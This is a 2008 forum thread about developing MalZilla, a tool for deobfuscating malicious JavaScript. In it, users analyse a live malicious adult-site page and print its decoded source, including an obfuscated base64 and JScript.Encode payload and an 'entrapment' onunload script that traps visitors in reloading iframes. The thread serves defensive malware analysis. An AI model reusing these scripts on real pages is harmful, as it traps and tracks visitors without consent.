Author Topic: MalZilla  (Read 236036 times)

0 Members and 1 Guest are viewing this topic.

February 29, 2008, 07:53:08 pm
Reply #45

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hi TJS,

I'll make a checkbox for 'Use Referrer', null problemo.

Where you want exactly to have 'Get to new tab'? On Download tab? It does not make sense to me.
Or you mean on download section of Clipboard Monitor?

A question: at creating new tab in Download, should I take some parameters from current tab (User Agent etc.)?

Selection length problem:
It is calculated just if you select something by using mouse. It is triggered on onMouseUp event. Should I change this to work on Find too?

I have added right-click menu to Clipboard Monitor list, so you can paste links by hand. There is no need to keep the Clipboard Monitor running.
btw. Clipboard Monitor does not clear the clipboard anymore. This can lead to other issues, but we will see if this is better than clearing the clipboard.

I've also added right-click menu to Debugger's Variable State list, so one can Copy the data from there if the script does not compile.

February 29, 2008, 08:16:27 pm
Reply #46

sowhat-x

  • Guest
bobby,saw this over at SourceForge,
and it reminded me somehow what was discussed earlier,
regarding the usability of the 'Hex" view...it's Delphi:
http://sourceforge.net/projects/httpbot

What are your thoughts on this...having Malzilla able to also work in proxy-mode at some moment?
This way someone could also interact directly with the sites in question via his/her browser if needed:
ie.actually have it exploited and also keep records of all actions that took place in the http session...
Not a request,as it is quite a bit of work obviously,just random thoughts regarding future ideas...

February 29, 2008, 08:34:55 pm
Reply #47

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
@sowhat-x

Well, I must admit that I can't manage to add more functionality to Malzilla :(
The existing code needs to be updated all the time because of new scripts which are using new obfuscation techniques, and I can barely manage to get some free time to do that (hope to find some normal job in a couple of months, with normal working times).
Next thing to do is to extend the PScript's functionality, and to work on concatenating variables (TJS' request).
Also, if I can get some help from JavaScript Bridge people (wrapper I use for SpiderMonkey, http://delphi.mozdev.org/ ), I would like to make step-by-step debugger.
Unfortunately, till now I didn't received any useful help from them, and the debuger from the wrapper does not work if I set step-by-step option (Access violation).
Other things that also need attention are the complicated DOM things like document.createElement.
It is used a lot recently, and I still didn't get behind getting access violations when I try to manage it.

You will probably also want to take a look at Fiddler if you want to run malware on lamb-box:
http://www.fiddlertool.com/fiddler/

February 29, 2008, 08:43:38 pm
Reply #48

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.

February 29, 2008, 09:17:23 pm
Reply #49

sowhat-x

  • Guest
I agree 100% with what JohnC said...
wish I could actually give a bit of practical help;to be honest,
that's also the main reason I posted the few links to javascript-related blogs couple days ago,
just in case they provide you with a couple of new tricks/ideas or so...

Since it's still a 'one man's show'...patience,and everything will work out eventually...  ;)
It's not possible to catch up with everything at once,daily life obligations and the rest:
as a guess in the wild,situation must also be quite 'tricky' at the moment there,
with the latest stuff taking place in the Balkan area...
let's just hope things don't get any worse/more complicated than what they currently are...  :-\

And hey,I really mean it when I say 'not request,just random ideas',lol...
I have quite a few of http interceptors around here,perl/python stuff,
some of them I had also converted to standalone exes for use under machines without interpreters...
I'll have to dig my archives and submit them over at some moment during this month...

February 29, 2008, 11:41:04 pm
Reply #50

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Nice idea about the right click stuff...

About the find length issue-- it's your project, and up to you. I just wanted to report it out because I want to help out in any way that I can :)

I'm not sure about the parameters issue.. I think that if you need the same referrer, then maybe it should remain in the same tab (in other words, don't persist referrer to new tabs) but usually proxy and user agent won't change when an analyst is going through multiple sites...

I agree with sowhat-x that these suggestions are only suggestions.. I don't want to dictate anything here :)

About the 'get to new tab' idea.. Let's say i'm looking at some site in tab (1) and i want to follow a url in a new tab, instead of opening a new tab and then pasting the url, how about letting me paste the url in tab (1) and click open in new tab or something like that.... i dunno, it's just an idea. In ffox/ie7 you can do a control-click on a URL to open it in a new tab- that would be HOT. :)

TJS


March 01, 2008, 12:10:13 am
Reply #51

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.

I'd have offered help when he first started developing it but I don't know Delphi .... :( (hoping to find some time to learn both Delphi and Ruby within the next 12 months - don't have much of it free)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 04, 2008, 02:13:05 am
Reply #52

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
This page is using decode64() in conjunction with unescape().. Am I doing something wrong or is the decode section in malzilla unable to iterate through decode64()?

Example (live malware):
Quote
hxxp://radt.info/?0a2V5d29yZD1Xd3crTWF0dXJlK1ZpcA==

TJS

Attached in case the URL 404s.

March 04, 2008, 02:27:13 am
Reply #53

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Decoded just* fine with Malzilla?

*typo correction

Code: [Select]
<html>
<head>
<title>Www Mature Vip</title>
<meta name="robots" CONTENT="noindex, nofollow, noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script language="javascript" src="/d.js"></script>
<script language="javascript">
var enter_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
var exit_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
</script>
<script language="jscript.encode" src="/pop31.js"></script>
</head>
<body onunload="entrapment(0)" bottommargin="0" leftmargin="0" marginheight="0" marginwidth="0" rightmargin="0" topmargin="0">
<script language="javascript">
var sts = "JTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTc0JTc5JTcwJTY1JTNEJTIyJTc0JTY1JTc4JTc0JTJGJTZBJTYxJTc2JTYxJTczJTYzJTcyJTY5JTcwJTc0JTIyJTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTZBJTczJTJFJTcwJTY4JTcwJTIyJTNFJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTY5JTZEJTY3JTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTcwJTY4JTcwJTIyJTIwJTYyJTZGJTcyJTY0JTY1JTcyJTNEJTIyJTMwJTIyJTIwJTYxJTZDJTc0JTNEJTIyJTIyJTNFJTNDJTJGJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNF";
document.write(unescape(decode64(sts)));
</script>
<script src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></script>
<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=pornstars" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>
<script language="jscript.encode" src="/pop32.js"></script>
</body>
</html>

Code: [Select]
<script type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></script><noscript><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscript>
The decode64 function is held in a seperate JS file, so you'd need to copy it over first;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/d.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:26:02:26
*****************************************************************
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + //all caps
"abcdefghijklmnopqrstuvwxyz" + //all lowercase
"0123456789+/="; // all numbers plus +/=

//Heres the decode function
function decode64(inp)
{
var out = ""; //This is the output
var chr1, chr2, chr3 = ""; //These are the 3 decoded bytes
var enc1, enc2, enc3, enc4 = ""; //These are the 4 bytes to be decoded
var i = 0; //Position counter

// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;

if (base64test.exec(inp)) { //Do some error checking
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, ?+?, ?/?, and ?=?\n" +
"Expect errors in decoding.");
}
inp = inp.replace(/[^A-Za-z0-9\+\/\=]/g, "");

do { //Here.s the decode loop.

//Grab 4 bytes of encoded content.
enc1 = keyStr.indexOf(inp.charAt(i++));
enc2 = keyStr.indexOf(inp.charAt(i++));
enc3 = keyStr.indexOf(inp.charAt(i++));
enc4 = keyStr.indexOf(inp.charAt(i++));

//Heres the decode part. There.s really only one way to do it.
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

//Start to output decoded content
out = out + String.fromCharCode(chr1);

if (enc3 != 64) {
out = out + String.fromCharCode(chr2);
}
if (enc4 != 64) {
out = out + String.fromCharCode(chr3);
}

//now clean out the variables used
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";

} while (i < inp.length); //finish off the loop

//Now return the decoded values.
return out;
}
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 04, 2008, 02:30:05 am
Reply #54

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/pop32.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:28:10:28
*****************************************************************
#@~^cgMAAA==r6Pc6bY{!D^Z'rJbP9W^;s+xD hMkYcE@!K4NJQJn^DPrN{^W,hr[Dt'T~4+ro4O{!~1Vm/J3JkrN{B/SUJQE&f)+$J3Jsl+)*yO2,E_E*zOqFGfO~FEQr*&RTZZE_rTWs{OszbvE@*@!&W(LE_r+^O@*J#p~k6P`UO+M{!Ds"xEr#~NK^Es+UOchDrO`E@!K8NJQr+1YP1Vmd/bNxB1Vdr9)Ny{m94vRC++N FqmWROv8% *cW*Xflc!TTZB~mK[4Ck+{BtDYalzJNGh VGC9R:m^DK:+9rCR1Wsz2E8&ktGm0Al7+&^m4/&W^ldtJdS0sm/4Rmm4[-+M/rW '{SZ~!BTB,hk9O4'EFEP4+rL4YxB8vPmVrL 'Bhr9Ns+E@*r_E@!wmDJ3JmhP lh+{BCs^WhU^DbwYz^^+k/EP-ls;'v/mh+GWhCbxB~&@*JQJ@!2mDE3Jm:P lsn'E:G\b+v~7lV!n'EwWaf /S0Qj.VxE3+UY.{!DsQrBP&@*r_E@!aCMJQrlsPxm:xB$ECVbYzv,\l^;+{BtbL4B,z@*@!2l.CsP~xmh+{B8L1WVG.EP-l^;'v[060060E~z@*JQJ@!+hE3J4[PkDm{v2Wa&c/A0_iMVxJ3nxD+.m!DVQEEP5EmsbYz{B4ko4B,8o1WsWM'v:6006W0EPhb[Ot{B8B~tnrTtO'EqB,xCh'B2.K:vPmsboU{BskN9VvPmVsWS?^.bwYz^m//{vdls+GWhlrUEPOXan'El22^kmCObWUzXRktG13Sl\O6slktvPaV;Lbx/aCo'B4OOw=zJhAh hmm.WsnNbl ^K:zLGJonY6sm/4aVmX+MB,&@*r_E@!JW8%r_J^Y@*J#p5xUBAA==^#~@

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:29:49:29
*****************************************************************
var noentrap = 0;

function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><head><title>Www Mature Vip</title><style type="text/css"><!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --></style></head><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></scr' + 'ipt><scr' + 'ipt type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></scr' + 'ipt><noscr' + 'ipt><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscr' + 'ipt>' +
'<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=celebs" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>');
document.close();
}
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 04, 2008, 04:42:39 am
Reply #55

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Decoder for jscript.encode is on Misc Decoders tab (Decode JS.encode).

March 04, 2008, 04:01:15 pm
Reply #56

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ah right hehe ...... I'd forgotten about that  :-[
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 04, 2008, 08:13:56 pm
Reply #57

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Ah right hehe ...... I'd forgotten about that  :-[

Not your guilt, I'm the one who does not have enough time to document all the functions.


@TJS
Just to let you know that "concatenate" function is implemented :)

March 04, 2008, 09:03:50 pm
Reply #58

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
woot! :)

March 07, 2008, 11:49:21 pm
Reply #59

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
0.9.3pre3 (0.9.2.3) uploaded to SourceForge one minute ago.
I do not know how much time will take until all the mirrors gets updated, but I hope in a couple of hours it should be available for download.